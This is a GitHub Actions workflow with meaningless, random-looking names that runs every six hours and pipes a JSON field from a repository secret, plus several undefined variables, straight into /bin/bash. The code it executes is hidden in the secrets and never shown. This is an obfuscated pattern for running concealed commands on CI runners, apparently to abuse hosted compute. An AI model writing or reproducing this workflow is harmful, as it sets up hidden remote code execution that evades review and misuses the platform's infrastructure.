name: escargotcommission

on:
  workflow_dispatch:
  schedule:
    - cron: '19 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: escargotcommission
        env:
          ifukk8: ${{ secrets.ifukk8 }}
        run: |
          echo $ifukk8 | jq -r .aasep9 | /bin/bash
          echo $gtru54 | jq -r .tmumm322 | /bin/bash
          echo $ewk85837 | jq -r .jmote3177 | /bin/bash
          echo $qfu2 | jq -r .v28 | /bin/bash
          echo $bouo00 | jq -r .h3202 | /bin/bash

